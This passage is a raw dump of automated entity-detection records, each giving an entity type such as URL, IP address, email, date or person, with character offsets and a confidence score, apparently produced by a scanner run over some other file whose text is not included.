24337, end: 24354, score: 0.5, type: URL, start: 24383, end: 24390, score: 0.5, type: URL, start: 24400, end: 24407, score: 0.5, type: URL, start: 24471, end: 24482, score: 0.5, type: URL, start: 24544, end: 24555, score: 0.5, type: URL, start: 25913, end: 25924, score: 0.5, type: URL, start: 26189, end: 26196, score: 0.5, type: URL, start: 26212, end: 26219, score: 0.5, type: URL, start: 26303, end: 26310, score: 0.5, type: URL, start: 26391, end: 26398, score: 0.5, type: URL, start: 26506, end: 26513, score: 0.5, type: URL, start: 26750, end: 26757, score: 0.5, type: URL, start: 26760, end: 26772, score: 0.5, type: URL, start: 26784, end: 26791, score: 0.5, type: URL, start: 26968, end: 26973, score: 0.5, type: URL, start: 27160, end: 27167, score: 0.5, type: URL, start: 27953, end: 27963, score: 0.5, type: URL, start: 28042, end: 28066, score: 0.5, type: URL, start: 28072, end: 28096, score: 0.5, type: URL, start: 28138, end: 28150, score: 0.5, type: URL, start: 28194, end: 28200, score: 0.5, type: URL, start: 28209, end: 28216, score: 0.5, type: URL, start: 29020, end: 29031, score: 0.5, type: URL, start: 29137, end: 29144, score: 0.5, type: URL, start: 29160, end: 29167, score: 0.5, type: URL, start: 29251, end: 29258, score: 0.5, type: URL, start: 29339, end: 29346, score: 0.5, type: URL, start: 29577, end: 29584, score: 0.5, type: URL, start: 29587, end: 29599, score: 0.5, type: URL, start: 29611, end: 29618, score: 0.5, type: URL, start: 29810, end: 29816, score: 0.5, type: URL, start: 30048, end: 30056, score: 0.5, type: URL, start: 30102, end: 30142, score: 0.5, type: URL, start: 30280, end: 30287, score: 0.5, type: URL, start: 30336, end: 30343, score: 0.5, type: URL, start: 30411, end: 30418, score: 0.5, type: URL, start: 30487, end: 30493, score: 0.5, type: URL, start: 31393, end: 31404, score: 0.5, type: URL, start: 31510, end: 31517, score: 0.5, type: URL, start: 31533, end: 31540, score: 0.5, type: URL, 
start: 31624, end: 31631, score: 0.5, type: URL, start: 31697, end: 31704, score: 0.5, type: URL, start: 31717, end: 31724, score: 0.5, type: URL, start: 31913, end: 31920, score: 0.5, type: URL, start: 31988, end: 31995, score: 0.5, type: URL, start: 32007, end: 32014, score: 0.5, type: URL, start: 32276, end: 32283, score: 0.5, type: URL, start: 32286, end: 32298, score: 0.5, type: URL, start: 32310, end: 32317, score: 0.5, type: URL, start: 32559, end: 32566, score: 0.5, type: URL, start: 32597, end: 32604, score: 0.5, type: URL, start: 32990, end: 32996, score: 0.5, type: URL, start: 33250, end: 33256, score: 0.5, type: URL, start: 33364, end: 33369, score: 0.5, type: URL, start: 33428, end: 33433, score: 0.5, type: URL, start: 33717, end: 33724, score: 0.5, type: URL, start: 33847, end: 33853, score: 0.5, type: URL, start: 33907, end: 33913, score: 0.5, type: URL, start: 33996, end: 34002, score: 0.5, type: URL, start: 34101, end: 34107, score: 0.5, type: URL, start: 34551, end: 34558, score: 0.5, type: URL, start: 34581, end: 34593, score: 0.5, type: URL, start: 34953, end: 34959, score: 0.5, type: URL, start: 34967, end: 34977, score: 0.5, type: URL, start: 34988, end: 34998, score: 0.5, type: URL, start: 35013, end: 35020, score: 0.5, type: URL, start: 35255, end: 35261, score: 0.5, type: URL, start: 35268, end: 35275, score: 0.5, type: URL, start: 35312, end: 35318, score: 0.5, type: URL, start: 35347, end: 35354, score: 0.5, type: URL, start: 35562, end: 35567, score: 0.5, type: URL, start: 35669, end: 35680, score: 0.5, type: URL, start: 35739, end: 35747, score: 0.5, type: URL, start: 35797, end: 35837, score: 0.5, type: URL, start: 35957, end: 35963, score: 0.5, type: URL, start: 36762, end: 36773, score: 0.5, type: URL, start: 36879, end: 36886, score: 0.5, type: URL, start: 36902, end: 36909, score: 0.5, type: URL, start: 36993, end: 37000, score: 0.5, type: URL, start: 37081, end: 37088, score: 0.5, type: URL, start: 37329, end: 37336, score: 0.5, type: URL, start: 37339, end: 37351, score: 0.5, type: URL, start: 37363, end: 37370, score: 0.5, type: URL, start: 37562, end: 37568, score: 0.5, type: URL, start: 37795, end: 37801, score: 0.5, type: URL, start: 37850, end: 37856, score: 0.5, type: URL, start: 38056, end: 38062, score: 0.5, type: URL, start: 38157, end: 38169, score: 0.5, type: URL, start: 38521, end: 38540, score: 0.5, type: URL, start: 38836, end: 38847, score: 0.5, type: URL, start: 38972, end: 38979, score: 0.5, type: URL, start: 38995, end: 39002, score: 0.5, type: URL, start: 39299, end: 39306, score: 0.5, type: URL, start: 39352, end: 39357, score: 0.5, type: URL, start: 39760, end: 39767, score: 0.5, type: URL, start: 39770, end: 39782, score: 0.5, type: URL, start: 39794, end: 39801, score: 0.5, type: URL, start: 39941, end: 39946, score: 0.5, type: URL, start: 40075, end: 40082, score: 0.5, type: URL, start: 40682, end: 40689, score: 0.5, type: URL, start: 40701, end: 40708, score: 0.5, type: URL, start: 40791, end: 40798, score: 0.5, type: URL, start: 41143, end: 41150, score: 0.5, type: URL, start: 41724, end: 41729, score: 0.5, type: URL, start: 41791, end: 41801, score: 0.5, type: URL, start: 43134, end: 43141, score: 0.5, type: URL, start: 43153, end: 43160, score: 0.5, type: URL, start: 43444, end: 43451, score: 0.5, type: URL, start: 43516, end: 43521, score: 0.5, type: URL, start: 43593, end: 43598, score: 0.5, type: URL, start: 44093, end: 44105, score: 0.5, type: URL, start: 44170, end: 44175, score: 0.5, type: URL, start: 44223, end: 44231, 
score: 0.5, type: URL, start: 44279, end: 44290, score: 0.5, type: URL, start: 44300, end: 44308, score: 0.5, type: URL, start: 44403, end: 44413, score: 0.5, type: URL, start: 44496, end: 44506, score: 0.5, type: URL, start: 44767, end: 44777, score: 0.5, type: URL, start: 44819, end: 44829, score: 0.5, type: URL, start: 44863, end: 44873, score: 0.5, type: URL, start: 45456, end: 45463, score: 0.5, type: URL, start: 45821, end: 45830, score: 0.5, type: URL, start: 45903, end: 45913, score: 0.5, type: URL, start: 46029, end: 46033, score: 0.5, type: URL, start: 46319, end: 46324, score: 0.5, type: URL, start: 46385, end: 46393, score: 0.5, type: URL, start: 46432, end: 46441, score: 0.5, type: URL, start: 46540, end: 46549, score: 0.5, type: URL, start: 46656, end: 46660, score: 0.5, type: URL, start: 47810, end: 47817, score: 0.5, type: URL, start: 47828, end: 47835, score: 0.5, type: URL, start: 47903, end: 47910, score: 0.5, type: URL, start: 47930, end: 47937, score: 0.5, type: URL, start: 48013, end: 48020, score: 0.5, type: URL, start: 48038, end: 48045, score: 0.5, type: URL, start: 48119, end: 48127, score: 0.5, type: URL, start: 48147, end: 48154, score: 0.5, type: URL, start: 48450, end: 48457, score: 0.5, type: URL, start: 48544, end: 48551, score: 0.5, type: URL, start: 48810, end: 48817, score: 0.5, type: URL, start: 48828, end: 48840, score: 0.5, type: URL, start: 48973, end: 48980, score: 0.5, type: URL, start: 48996, end: 49003, score: 0.5, type: URL, start: 49008, end: 49020, score: 0.5, type: URL, start: 49110, end: 49123, score: 0.5, type: URL, start: 49131, end: 49138, score: 0.5, type: URL, start: 49157, end: 49165, score: 0.5, type: URL, start: 49184, end: 49191, score: 0.5, type: URL, start: 49252, end: 49259, score: 0.5, type: URL, start: 49327, end: 49334, score: 0.5, type: URL, start: 49456, end: 49463, score: 0.5, type: URL, start: 49833, end: 49845, score: 0.5, type: URL, start: 49866, end: 49873, score: 0.5, type: URL, start: 49928, end: 49937, score: 0.5, type: URL, start: 50472, end: 50479, score: 0.5, type: URL, start: 50569, end: 50576, score: 0.5, type: URL, start: 50590, end: 50597, score: 0.5, type: URL, start: 50992, end: 51002, score: 0.5, type: URL, start: 51131, end: 51143, score: 0.5, type: URL, start: 51170, end: 51177, score: 0.5, type: URL, start: 51225, end: 51237, score: 0.5, type: URL, start: 51280, end: 51292, score: 0.5, type: URL, start: 51638, end: 51645, score: 0.5, type: URL, start: 51694, end: 51701, score: 0.5, type: URL, start: 51796, end: 51803, score: 0.5, type: URL, start: 51836, end: 51843, score: 0.5, type: URL, start: 52117, end: 52129, score: 0.5, type: URL, start: 52601, end: 52611, score: 0.5, type: URL, start: 52716, end: 52726, score: 0.5, type: URL, start: 52770, end: 52788, score: 0.5, type: URL, start: 52842, end: 52860, score: 0.5, type: URL, start: 52956, end: 52966, score: 0.5, type: URL, start: 53010, end: 53028, score: 0.5, type: URL, start: 53085, end: 53103, score: 0.5, type: URL, start: 53174, end: 53192, score: 0.5, type: URL, start: 53706, end: 53711, score: 0.5, type: URL, start: 53775, end: 53815, score: 0.5, type: URL, start: 53881, end: 53921, score: 0.5, type: URL, start: 53989, end: 54024, score: 0.5, type: URL, start: 54060, end: 54072, score: 0.5, type: URL, start: 54720, end: 54727, score: 0.5, type: URL, start: 54979, end: 54991, score: 0.5, type: URL, start: 55175, end: 55187, score: 0.5, type: URL, start: 55939, end: 55945, score: 0.5, type: URL, start: 56041, end: 56053, score: 0.5, type: URL, 
start: 56686, end: 56698, score: 0.5, type: URL, start: 56891, end: 56904, score: 0.5, type: URL, start: 57287, end: 57306, score: 0.5, type: URL, start: 57322, end: 57340, score: 0.5, type: URL, start: 57456, end: 57471, score: 0.5, type: URL, start: 58310, end: 58317, score: 0.5, type: URL, start: 58329, end: 58336, score: 0.5, type: URL, start: 58556, end: 58563, score: 0.5, type: URL, start: 58580, end: 58620, score: 0.5, type: URL, start: 58749, end: 58782, score: 0.5, type: URL, start: 59237, end: 59249, score: 0.5, type: URL, start: 59705, end: 59715, score: 0.5, type: URL, start: 60252, end: 60263, score: 0.5, type: URL, start: 60430, end: 60437, score: 0.5, type: URL, start: 60453, end: 60465, score: 0.5, type: URL, start: 60547, end: 60554, score: 0.5, type: URL, start: 60565, end: 60572, score: 0.5, type: URL, start: 60640, end: 60647, score: 0.5, type: URL, start: 60658, end: 60665, score: 0.5, type: URL, start: 60698, end: 60710, score: 0.5, type: URL, start: 60795, end: 60802, score: 0.5, type: URL, start: 60806, end: 60818, score: 0.5, type: URL, start: 60832, end: 60839, score: 0.5, type: URL, start: 60855, end: 60862, score: 0.5, type: URL, start: 61157, end: 61164, score: 0.5, type: URL, start: 61178, end: 61185, score: 0.5, type: URL, start: 61201, end: 61208, score: 0.5, type: URL, start: 61219, end: 61226, score: 0.5, type: URL, start: 61286, end: 61298, score: 0.5, type: URL, start: 61321, end: 61328, score: 0.5, type: URL, start: 61349, end: 61356, score: 0.5, type: URL, start: 61402, end: 61414, score: 0.5, type: URL, start: 61437, end: 61446, score: 0.5, type: URL, start: 61471, end: 61478, score: 0.5, type: URL, start: 61489, end: 61496, score: 0.5, type: URL, start: 61502, end: 61514, score: 0.5, type: URL, start: 61591, end: 61598, score: 0.5, type: URL, start: 61705, end: 61715, score: 0.5, type: URL, start: 61749, end: 61761, score: 0.5, type: URL, start: 61869, end: 61876, score: 0.5, type: URL, start: 61914, end: 61926, score: 0.5, type: URL, start: 61946, end: 61958, score: 0.5, type: URL, start: 61980, end: 61992, score: 0.5, type: URL, start: 62082, end: 62089, score: 0.5, type: URL, start: 62578, end: 62585, score: 0.5, type: URL, start: 62622, end: 62634, score: 0.5, type: URL, start: 62657, end: 62664, score: 0.5, type: URL, start: 62685, end: 62692, score: 0.5, type: URL, start: 62738, end: 62750, score: 0.5, type: URL, start: 62773, end: 62782, score: 0.5, type: URL, start: 62807, end: 62814, score: 0.5, type: URL, start: 62825, end: 62832, score: 0.5, type: URL, start: 62838, end: 62850, score: 0.5, type: URL, start: 62927, end: 62934, score: 0.5, type: URL, start: 63012, end: 63024, score: 0.5, type: URL, start: 63131, end: 63138, score: 0.5, type: URL, start: 63172, end: 63184, score: 0.5, type: URL, start: 63204, end: 63216, score: 0.5, type: URL, start: 63238, end: 63250, score: 0.5, type: URL, start: 63340, end: 63347, score: 0.5, type: URL, start: 63643, end: 63650, score: 0.5, type: URL, start: 63700, end: 63709, score: 0.5, type: URL, start: 64640, end: 64651, score: 0.5, type: URL, start: 64883, end: 64890, score: 0.5, type: URL, start: 64906, end: 64913, score: 0.5, type: URL, start: 66439, end: 66446, score: 0.5, type: URL, start: 66460, end: 66467, score: 0.5, type: URL, start: 66742, end: 66749, score: 0.5, type: URL, start: 66763, end: 66770, score: 0.5, type: URL, start: 67058, end: 67065, score: 0.5, type: URL, start: 67174, end: 67181, score: 0.5, type: URL, start: 67258, end: 67265, score: 0.5, type: URL, start: 67278, end: 67285, 
score: 0.5, type: URL, start: 67615, end: 67625, score: 0.5, type: URL, start: 67661, end: 67671, score: 0.5, type: URL, start: 68165, end: 68172, score: 0.5, type: URL, start: 68206, end: 68213, score: 0.5, type: URL, start: 68289, end: 68296, score: 0.5, type: URL, start: 68330, end: 68337, score: 0.5, type: URL, start: 68484, end: 68495, score: 0.5, type: URL, start: 68549, end: 68556, score: 0.5, type: URL, start: 68708, end: 68715, score: 0.5, type: URL, start: 68750, end: 68757, score: 0.5, type: URL, start: 68871, end: 68878, score: 0.5, type: URL, start: 69025, end: 69032, score: 0.5, type: URL, start: 69123, end: 69135, score: 0.5, type: URL, start: 69150, end: 69157, score: 0.5, type: URL, start: 69343, end: 69356, score: 0.5, type: URL, start: 69778, end: 69789, score: 0.5, type: URL, start: 70308, end: 70318, score: 0.5, type: URL, start: 70362, end: 70372, score: 0.5, type: URL, start: 70946, end: 70957, score: 0.5, type: URL, start: 71063, end: 71070, score: 0.5, type: URL, start: 71086, end: 71093, score: 0.5, type: URL, start: 71342, end: 71349, score: 0.5, type: URL, start: 71352, end: 71364, score: 0.5, type: URL, start: 71376, end: 71383, score: 0.5, type: URL, start: 71572, end: 71579, score: 0.5, type: URL, start: 71657, end: 71664, score: 0.5, type: URL, start: 71739, end: 71745, score: 0.5, type: URL, start: 71784, end: 71790, score: 0.5, type: URL, start: 72383, end: 72389, score: 0.5, type: URL, start: 72430, end: 72436, score: 0.5, type: URL, start: 72481, end: 72487, score: 0.5, type: URL, start: 72538, end: 72544, score: 0.5, type: URL, start: 72600, end: 72606, score: 0.5, type: URL, start: 72784, end: 72790, score: 0.5, type: URL, start: 72832, end: 72838, score: 0.5, type: URL, start: 73371, end: 73377, score: 0.5, type: URL, start: 73436, end: 73442, score: 0.5, type: URL, start: 73499, end: 73505, score: 0.5, type: URL, start: 73543, end: 73553, score: 0.5, type: URL, start: 73617, end: 73623, score: 0.5, type: URL, start: 73665, end: 73672, score: 0.5, type: URL, start: 73787, end: 73793, score: 0.5, type: URL, start: 73810, end: 73820, score: 0.5, type: URL, start: 73830, end: 73836, score: 0.5, type: URL, start: 73888, end: 73912, score: 0.5, type: URL, start: 73954, end: 73966, score: 0.5, type: URL, start: 73985, end: 73991, score: 0.5, type: URL, start: 74074, end: 74098, score: 0.5, type: URL, start: 74233, end: 74257, score: 0.5, type: URL, start: 74761, end: 74772, score: 0.5, type: URL, start: 75191, end: 75198, score: 0.5, type: URL, start: 75214, end: 75221, score: 0.5, type: URL, start: 75309, end: 75316, score: 0.5, type: URL, start: 75406, end: 75413, score: 0.5, type: URL, start: 75427, end: 75434, score: 0.5, type: URL, start: 75709, end: 75716, score: 0.5, type: URL, start: 75730, end: 75737, score: 0.5, type: URL, start: 76022, end: 76029, score: 0.5, type: URL, start: 76196, end: 76203, score: 0.5, type: URL, start: 76219, end: 76226, score: 0.5, type: URL, start: 76268, end: 76280, score: 0.5, type: URL, start: 76525, end: 76532, score: 0.5, type: URL, start: 76535, end: 76547, score: 0.5, type: URL, start: 76559, end: 76566, score: 0.5, type: URL, start: 76721, end: 76731, score: 0.5, type: URL, start: 76924, end: 76931, score: 0.5, type: URL, start: 76939, end: 76946, score: 0.5, type: URL, start: 77680, end: 77690, score: 0.5, type: URL, start: 77726, end: 77736, score: 0.5, type: URL, start: 78328, end: 78335, score: 0.5, type: URL, start: 78369, end: 78376, score: 0.5, type: URL, start: 78452, end: 78459, score: 0.5, type: URL, 
[detected elements, continued: a long run of machine-generated span annotations over the preceding file contents, one record per detection, serialized as "type: ENTITY_TYPE, start: char-offset, end: char-offset, score: confidence"; the excerpt opens and closes mid-record. Entity types occurring in this stretch: URL, IP_ADDRESS, EMAIL_ADDRESS, DATE_TIME, PERSON, LOCATION, NRP, with confidence scores of 0.5, 0.6, 0.85, or 1.0 and character offsets ranging from 38 up to 116799.]
type: URL, start: 18204, end: 18211, score: 0.5, type: URL, start: 18383, end: 18392, score: 0.5, type: URL, start: 18490, end: 18497, score: 0.5, type: URL, start: 18757, end: 18764, score: 0.5, type: URL, start: 18786, end: 18793, score: 0.5, type: URL, start: 18936, end: 18943, score: 0.5, type: URL, start: 18960, end: 18967, score: 0.5, type: URL, start: 19011, end: 19018, score: 0.5, type: URL, start: 19446, end: 19453, score: 0.5, type: URL, start: 19473, end: 19480, score: 0.5, type: URL, start: 19547, end: 19554, score: 0.5, type: URL, start: 19668, end: 19674, score: 0.5, type: URL, start: 19749, end: 19758, score: 0.5, type: URL, start: 19805, end: 19813, score: 0.5, type: URL, start: 19831, end: 19838, score: 0.5, type: URL, start: 19886, end: 19893, score: 0.5, type: URL, start: 19952, end: 19958, score: 0.5, type: URL, start: 20302, end: 20308, score: 0.5, type: URL, start: 20392, end: 20400, score: 0.5, type: URL, start: 20941, end: 20948, score: 0.5, type: URL, start: 21010, end: 21032, score: 0.5, type: URL, start: 21118, end: 21125, score: 0.5, type: URL, start: 21158, end: 21165, score: 0.5, type: URL, start: 21253, end: 21260, score: 0.5, type: URL, start: 21366, end: 21373, score: 0.5, type: URL, start: 21482, end: 21504, score: 0.5, type: URL, start: 21597, end: 21604, score: 0.5, type: URL, start: 21668, end: 21675, score: 0.5, type: URL, start: 22102, end: 22109, score: 0.5, type: URL, start: 22492, end: 22499, score: 0.5, type: URL, start: 22673, end: 22680, score: 0.5, type: URL, start: 22820, end: 22827, score: 0.5, type: URL, start: 22887, end: 22894, score: 0.5, type: URL, start: 23023, end: 23034, score: 0.5, type: URL, start: 23059, end: 23068, score: 0.5, type: URL, start: 23297, end: 23303, score: 0.5, type: URL, start: 23373, end: 23384, score: 0.5, type: URL, start: 23418, end: 23427, score: 0.5, type: URL, start: 23791, end: 23802, score: 0.5, type: URL, start: 23833, end: 23842, score: 0.5, type: URL, start: 24605, end: 24612, score: 0.5, type: URL, start: 24680, end: 24689, score: 0.5, type: URL, start: 24734, end: 24748, score: 0.5, type: URL, start: 24790, end: 24799, score: 0.5, type: URL, start: 24842, end: 24856, score: 0.5, type: URL, start: 24981, end: 24993, score: 0.5, type: URL, start: 25052, end: 25058, score: 0.5, type: URL, start: 25062, end: 25068, score: 0.5, type: URL, start: 25113, end: 25125, score: 0.5, type: URL, start: 25188, end: 25194, score: 0.5, type: URL, start: 25198, end: 25204, score: 0.5, type: URL, start: 25253, end: 25265, score: 0.5, type: URL, start: 25327, end: 25333, score: 0.5, type: URL, start: 25337, end: 25343, score: 0.5, type: URL, start: 25571, end: 25578, score: 0.5, type: URL, start: 25701, end: 25708, score: 0.5, type: URL, start: 26015, end: 26022, score: 0.5, type: URL, start: 26239, end: 26246, score: 0.5, type: URL, start: 26586, end: 26592, score: 0.5, type: URL, start: 26658, end: 26665, score: 0.5, type: URL, start: 26808, end: 26817, score: 0.5, type: URL, start: 26896, end: 26905, score: 0.5, type: URL, start: 26961, end: 26970, score: 0.5, type: URL, start: 27003, end: 27012, score: 0.5, type: URL, start: 27222, end: 27228, score: 0.5, type: URL, start: 27458, end: 27467, score: 0.5, type: URL, start: 27517, end: 27528, score: 0.5, type: URL, start: 27561, end: 27572, score: 0.5, type: URL, start: 27658, end: 27664, score: 0.5, type: URL, start: 27768, end: 27777, score: 0.5, type: URL, start: 27936, end: 27947, score: 0.5, type: URL, start: 28030, end: 28036, score: 0.5, type: URL, start: 28384, 
end: 28391, score: 0.5, type: URL, start: 28438, end: 28445, score: 0.5, type: URL, start: 28468, end: 28475, score: 0.5, type: URL, start: 28634, end: 28644, score: 0.5, type: URL, start: 28673, end: 28680, score: 0.5, type: URL, start: 28719, end: 28726, score: 0.5, type: URL, start: 28798, end: 28804, score: 0.5, type: URL, start: 28882, end: 28889, score: 0.5, type: URL, start: 28922, end: 28929, score: 0.5, type: URL, start: 28967, end: 28973, score: 0.5, type: URL, start: 29231, end: 29242, score: 0.5, type: URL, start: 29265, end: 29272, score: 0.5, type: URL, start: 29296, end: 29305, score: 0.5, type: URL, start: 29327, end: 29333, score: 0.5, type: URL, start: 29402, end: 29413, score: 0.5, type: URL, start: 29438, end: 29447, score: 0.5, type: URL, start: 29734, end: 29741, score: 0.5, type: URL, start: 29818, end: 29825, score: 0.5, type: URL, start: 30232, end: 30239, score: 0.5, type: URL, start: 30659, end: 30666, score: 0.5, type: URL, start: 30798, end: 30805, score: 0.5, type: URL, start: 30900, end: 30907, score: 0.5, type: URL, start: 30959, end: 30965, score: 0.5, type: URL, start: 31869, end: 31879, score: 0.5, type: URL, start: 31974, end: 31981, score: 0.5, type: URL, start: 31997, end: 32004, score: 0.5, type: URL, start: 32027, end: 32033, score: 0.5, type: URL, start: 32125, end: 32132, score: 0.5, type: URL, start: 32145, end: 32152, score: 0.5, type: URL, start: 32175, end: 32181, score: 0.5, type: URL, start: 32350, end: 32361, score: 0.5, type: URL, start: 32416, end: 32423, score: 0.5, type: URL, start: 32478, end: 32489, score: 0.5, type: URL, start: 32895, end: 32901, score: 0.5, type: URL, start: 32908, end: 32918, score: 0.5, type: URL, start: 33162, end: 33172, score: 0.5, type: URL, start: 33184, end: 33190, score: 0.5, type: URL, start: 33201, end: 33206, score: 0.5, type: URL, start: 33217, end: 33227, score: 0.5, type: URL, start: 33345, end: 33351, score: 0.5, type: URL, start: 33466, end: 33476, score: 0.5, type: URL, start: 33479, end: 33484, score: 0.5, type: URL, start: 33495, end: 33505, score: 0.5, type: URL, start: 33512, end: 33518, score: 0.5, type: URL, start: 33714, end: 33723, score: 0.5, type: URL, start: 33907, end: 33916, score: 0.5, type: URL, start: 34150, end: 34159, score: 0.5, type: URL, start: 34305, end: 34314, score: 0.5, type: URL, start: 34484, end: 34493, score: 0.5, type: URL, start: 34684, end: 34693, score: 0.5, type: URL, start: 34902, end: 34911, score: 0.5, type: URL, start: 35092, end: 35101, score: 0.5, type: URL, start: 35332, end: 35341, score: 0.5, type: URL, start: 35477, end: 35486, score: 0.5, type: URL, start: 35728, end: 35737, score: 0.5, type: URL, start: 35906, end: 35915, score: 0.5, type: URL, start: 36301, end: 36310, score: 0.5, type: URL, start: 36634, end: 36643, score: 0.5, type: URL, start: 37008, end: 37017, score: 0.5, type: URL, start: 37282, end: 37291, score: 0.5, type: URL, start: 37456, end: 37465, score: 0.5, type: URL, start: 37608, end: 37617, score: 0.5, type: URL, start: 37780, end: 37789, score: 0.5, type: URL, start: 38190, end: 38199, score: 0.5, type: URL, start: 38349, end: 38358, score: 0.5, type: URL, start: 38497, end: 38506, score: 0.5, type: URL, start: 38672, end: 38681, score: 0.5, type: URL, start: 38847, end: 38856, score: 0.5, type: URL, start: 39017, end: 39026, score: 0.5, type: URL, start: 39057, end: 39067, score: 0.5, type: URL, start: 39092, end: 39101, score: 0.5, type: URL, start: 39184, end: 39194, score: 0.5, type: URL, start: 39215, end: 39224, score: 0.5, 
type: URL, start: 39326, end: 39336, score: 0.5, type: URL, start: 39365, end: 39374, score: 0.5, type: URL, start: 39511, end: 39521, score: 0.5, type: URL, start: 39538, end: 39548, score: 0.5, type: URL, start: 39568, end: 39578, score: 0.5, type: URL, start: 39716, end: 39721, score: 0.5, type: URL, start: 39751, end: 39756, score: 0.5, type: URL, start: 39787, end: 39792, score: 0.5, type: URL, start: 39822, end: 39827, score: 0.5, type: URL, start: 39870, end: 39875, score: 0.5, type: URL, start: 39900, end: 39905, score: 0.5, type: URL, start: 39929, end: 39937, score: 0.5, type: URL, start: 39960, end: 39969, score: 0.5, type: URL, start: 39992, end: 40001, score: 0.5, type: URL, start: 40016, end: 40024, score: 0.5, type: URL, start: 40034, end: 40043, score: 0.5, type: URL, start: 40123, end: 40128, score: 0.5, type: URL, start: 40372, end: 40377, score: 0.5, type: URL, start: 40416, end: 40426, score: 0.5, type: URL, start: 40468, end: 40478, score: 0.5, type: URL, start: 40523, end: 40536, score: 0.5, type: URL, start: 40671, end: 40677, score: 0.5, type: URL, start: 40909, end: 40919, score: 0.5, type: URL, start: 40954, end: 40964, score: 0.5, type: URL, start: 40992, end: 41002, score: 0.5, type: URL, start: 41017, end: 41023, score: 0.5, type: URL, start: 41030, end: 41040, score: 0.5, type: URL, start: 41202, end: 41207, score: 0.5, type: URL, start: 41493, end: 41503, score: 0.5, type: URL, start: 41531, end: 41540, score: 0.5, type: URL, start: 41638, end: 41648, score: 0.5, type: URL, start: 41653, end: 41663, score: 0.5, type: URL, start: 41670, end: 41680, score: 0.5, type: URL, start: 41695, end: 41705, score: 0.5, type: URL, start: 41709, end: 41719, score: 0.5, type: URL, start: 41767, end: 41777, score: 0.5, type: URL, start: 41863, end: 41873, score: 0.5, type: URL, start: 41954, end: 41963, score: 0.5, type: URL, start: 41996, end: 42005, score: 0.5, type: URL, start: 42012, end: 42021, score: 0.5, type: URL, start: 42036, end: 42045, score: 0.5, type: URL, start: 42237, end: 42247, score: 0.5, type: URL, start: 42287, end: 42296, score: 0.5, type: URL, start: 43246, end: 43256, score: 0.5, type: URL, start: 43281, end: 43291, score: 0.5, type: URL, start: 43334, end: 43344, score: 0.5, type: URL, start: 43348, end: 43358, score: 0.5, type: URL, start: 43397, end: 43407, score: 0.5, type: URL, start: 43433, end: 43443, score: 0.5, type: URL, start: 43454, end: 43463, score: 0.5, type: URL, start: 43473, end: 43479, score: 0.5, type: URL, start: 43663, end: 43673, score: 0.5, type: URL, start: 43792, end: 43804, score: 0.5, type: URL, start: 43975, end: 43981, score: 0.5, type: URL, start: 43994, end: 44000, score: 0.5, type: URL, start: 44055, end: 44064, score: 0.5, type: URL, start: 44073, end: 44079, score: 0.5, type: URL, start: 44134, end: 44143, score: 0.5, type: URL, start: 44360, end: 44367, score: 0.5, type: URL, start: 44522, end: 44528, score: 0.5, type: URL, start: 44889, end: 44899, score: 0.5, type: URL, start: 45062, end: 45069, score: 0.5, type: URL, start: 45154, end: 45160, score: 0.5, type: URL, start: 45428, end: 45438, score: 0.5, type: URL, start: 45523, end: 45528, score: 0.5, type: URL, start: 45599, end: 45609, score: 0.5, type: URL, start: 45614, end: 45624, score: 0.5, type: URL, start: 45824, end: 45834, score: 0.5, type: URL, start: 45837, end: 45847, score: 0.5, type: URL, start: 45862, end: 45868, score: 0.5, type: URL, start: 46040, end: 46050, score: 0.5, type: URL, start: 46157, end: 46167, score: 0.5, type: URL, start: 46620, 
end: 46626, score: 0.5, type: URL, start: 47318, end: 47328, score: 0.5, type: URL, start: 47331, end: 47341, score: 0.5, type: URL, start: 47431, end: 47441, score: 0.5, type: URL, start: 47611, end: 47621, score: 0.5, type: URL, start: 47730, end: 47740, score: 0.5, type: URL, start: 47795, end: 47801, score: 0.5, type: URL, start: 48090, end: 48096, score: 0.5, type: URL, start: 48312, end: 48322, score: 0.5, type: URL, start: 48469, end: 48479, score: 0.5, type: URL, start: 48660, end: 48665, score: 0.5, type: URL, start: 48695, end: 48699, score: 0.5, type: URL, start: 48787, end: 48800, score: 0.5, type: URL, start: 49133, end: 49139, score: 0.5, type: URL, start: 49152, end: 49158, score: 0.5, type: URL, start: 49421, end: 49428, score: 0.5, type: URL, start: 49659, end: 49668, score: 0.5, type: URL, start: 49678, end: 49683, score: 0.5, type: URL, start: 49996, end: 50002, score: 0.5, type: URL, start: 50107, end: 50113, score: 0.5, type: URL, start: 50127, end: 50133, score: 0.5, type: URL, start: 50659, end: 50666, score: 0.5, type: URL, start: 50731, end: 50738, score: 0.5, type: URL, start: 50997, end: 51003, score: 0.5, type: URL, start: 51084, end: 51090, score: 0.5, type: URL, start: 51106, end: 51112, score: 0.5, type: URL, start: 51301, end: 51307, score: 0.5, type: URL, start: 51317, end: 51323, score: 0.5, type: URL, start: 51352, end: 51358, score: 0.5, type: URL, start: 51423, end: 51429, score: 0.5, type: URL, start: 51433, end: 51440, score: 0.5, type: URL, start: 51447, end: 51453, score: 0.5, type: URL, start: 51502, end: 51508, score: 0.5, type: URL, start: 51513, end: 51519, score: 0.5, type: URL, start: 51770, end: 51776, score: 0.5, type: URL, start: 51798, end: 51808, score: 0.5, type: URL, start: 51975, end: 51981, score: 0.5, type: URL, start: 51991, end: 51997, score: 0.5, type: URL, start: 52023, end: 52029, score: 0.5, type: URL, start: 52057, end: 52067, score: 0.5, type: URL, start: 52138, end: 52144, score: 0.5, type: URL, start: 52148, end: 52155, score: 0.5, type: URL, start: 52162, end: 52168, score: 0.5, type: URL, start: 52221, end: 52227, score: 0.5, type: URL, start: 52232, end: 52238, score: 0.5, type: URL, start: 52531, end: 52537, score: 0.5, type: URL, start: 52580, end: 52586, score: 0.5, type: URL, start: 52590, end: 52597, score: 0.5, type: URL, start: 52687, end: 52692, score: 0.5, type: URL, start: 52706, end: 52712, score: 0.5, type: URL, start: 52822, end: 52829, score: 0.5, type: URL, start: 52850, end: 52856, score: 0.5, type: URL, start: 53047, end: 53052, score: 0.5, type: URL, start: 53089, end: 53095, score: 0.5, type: URL, start: 53137, end: 53143, score: 0.5, type: URL, start: 53367, end: 53373, score: 0.5, type: URL, start: 53420, end: 53438, score: 0.5, type: URL, start: 53466, end: 53484, score: 0.5, type: URL, start: 53499, end: 53506, score: 0.5, type: URL, start: 53525, end: 53531, score: 0.5, type: URL, start: 53550, end: 53556, score: 0.5, type: URL, start: 53582, end: 53588, score: 0.5, type: URL, start: 53592, end: 53599, score: 0.5, type: URL, start: 53659, end: 53665, score: 0.5, type: URL, start: 53702, end: 53708, score: 0.5, type: URL, start: 54019, end: 54026, score: 0.5, type: URL, start: 54053, end: 54060, score: 0.5, type: URL, start: 54121, end: 54128, score: 0.5, type: URL, start: 54143, end: 54149, score: 0.5, 